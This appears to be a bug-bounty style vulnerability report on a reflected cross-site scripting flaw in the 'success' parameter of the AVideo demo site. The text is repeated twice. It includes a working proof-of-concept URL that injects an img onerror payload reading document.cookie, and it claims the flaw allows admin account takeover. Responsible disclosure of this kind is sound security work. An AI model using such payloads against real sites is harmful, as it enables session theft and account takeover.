Description:
While making an account in demo.avideo.com I found a parameter "?success=" which did not sanitize any symbol character properly which leads to XSS attack.
Impact:
Since there's an Admin account on demo.avideo.com attacker can use this attack to Takeover the admin's account
Step to Reproduce:
- Click the link below
https://demo.avideo.com/user?success="><img src=x onerror=alert(document.cookie)>
- Then XSS will be executed
gonzxph Finder
Description:
While making an account in demo.avideo.com I found a parameter "?success=" which did not sanitize any symbol character properly which leads to XSS attack.
Impact:
Since there's an Admin account on demo.avideo.com attacker can use this attack to Takeover the admin's account
Step to Reproduce:
https://demo.avideo.com/user?success="><img src=x onerror=alert(document.cookie)>